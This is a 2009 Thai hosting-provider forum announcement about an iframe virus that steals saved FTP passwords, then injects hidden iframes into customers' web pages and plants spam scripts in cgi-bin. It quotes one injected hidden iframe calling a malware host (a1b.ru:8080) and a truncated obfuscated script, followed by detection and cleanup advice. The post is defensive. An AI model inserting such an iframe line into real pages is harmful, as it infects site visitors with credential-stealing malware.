เว็บโฮสติ้ง Pinkkeyhost :: Support Center

News & Announcement => Announcement => ข้อความที่เริ่มโดย: PinkkeyHost ที่ 16 ต.ค. 2009 06:44



หัวข้อ: แจ้งเตือนไวรัส IFRAME ระบาด
เริ่มหัวข้อโดย: PinkkeyHost ที่ 16 ต.ค. 2009 06:44

แค่เปิดเว็บที่ถูกฝัง iframe ด้วย Firefox หรือ IE ก็ติดทันทีเลยครับ
ขนาดว่ามี antivirus และมันก็ขึ้นข้อความเตือนด้วยว่าพบไฟล์ trojan ใน temp ขึ้นมาติดๆกัน 4 ครั้ง เปลี่ยนชื่อไปเรื่อยๆ แล้วก็เงียบไป
ก็นึกว่าคงไม่มีอะไร ผ่านไป 4 ชม กลับมาเช็ค ftp log ปรากฎว่าโดนไปหลาย user เลย (เป็น user ของผมเอง ที่เก็บ password ไว้ใน filezilla แต่ไม่ได้เปิดโปรแกรม)
ตอนนี้เลยลบ user ใน filezilla ออกไว้ก่อน แล้วก็เปลี่ยน password ใหม่หมด
ดูจาก log โดนไป 4 user จาก 8 user ที่เก็บไว้ ดีว่าเครื่องนั้นไม่ค่อยได้ใช้เลยมี account save ไว้น้อย
น่าจะเป็น trojan ตัวใหม่ที่ antivirus ยังไม่รู้จัก

สรุปตอนนี้ไม่ว่าเปิดด้วย IE หรือ Firefox ถ้าใช้ Windows ก็เสี่ยงเหมือนกันหมด


ข้อมูลและการระบาดเกี่ยวกับ Virus iFrame
1. เครื่อง user เปิดเว็บที่ถูกแทรก iframe แล้วทำให้เครื่องติดไวรัส
2. ไวรัสทำการขโมยรหัสผ่าน ftp ไป (มีทั้งดักจับจากการรับส่งข้อมูลตอน login ftp และเอาไฟล์ config ของโปรแกรม ftp ที่ save ไว้ในเครื่องไป)
3. เว็บที่ถูกขโมยรหัสผ่านก็จะถูกเข้ามาแก้ไขไฟล์ index และ/หรือ ไฟล์ .php .html (เกือบ)ทั้งหมด โดยแทรก iframe เรียกไฟล์ไวรัสเพิ่มเข้าไป และ/หรือ มีการเอาไฟล์มาวางเพื่อการต่างๆ เช่นส่ง spam เมล์
4. คนที่เปิดเว็บที่ถูกฝัง iframe ติดไวรัสโดยไม่รู้ตัว ( = ข้อ1 )

การทำงานของ virus เท่าที่พบจะมี 2 แบบคือ
1. แก้ไขไฟล์ index .php .html .htm แทรก code iframe เพื่อกระจายไวรัส ที่พบมีอยู่หลายรูปแบบ ตัวอย่าง
โค๊ด:
<iframe src="http://a1b.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>
โค๊ด:
<script  unescapechar(....

โดยจะเพิ่มหลัง tag <body> หรือ ต้นไฟล์ หรือ บรรทัดสุดท้าย

2. วางไฟล์ใน cgi-bin เพื่อส่ง spam เมล์ออกไปจำนวนมาก ซึ่งจะมีผลเฉพาะกับเว็บที่เปิด cgi ไว้ ที่พบบ่อยคือ dark.cgi

การตรวจสอบ
เวลาเปิดเว็บโปรแกรม antivirus จะแจ้งเตือน หรือถ้าเปิดด้วย firefox อาจจะพบเป็นหน้าถูก block reported attrack site สีแดงๆ (แต่ถ้าโดนฝัง virus ตัวใหม่ที่ antivirus ยังไม่ update ก็จะติดทันที)
view source ดูจะพบว่ามีการแทรก code iframe ตามตัวอย่างด้านบน


การป้องกันและแก้ไข
1. ติดตั้งโปรแกรม antivirus และหมั่น update data อย่างสม่ำเสมอ
2. หากติดแล้วให้หาโปรแกรมมาฆ่า หรือหากฆ่าไม่ได้ก็จำเป็นต้องลง windwos ใหม่
3. ไม่ save รหัสผ่าน ftp ไว้ในโปรแกรม ftp โดยเฉพาะ filezilla
4. ถ้าติดแล้วให้หาเครื่องที่ปลอดภัยเปลี่ยนรหัสผ่าน user ที่ติดไวรัสใหม่
5. เมื่อถูกแทรก script ให้แก้ไขเอา code ที่แทรกออกให้หมด
6. ถ้าเป็นไปได้ให้ใช้ Linux หรือ OSX แทน windows
7. เลี่ยงการใช้โปรแกรม crack ประเภท keygen เพราะมักมี trojan แฝงมาด้วย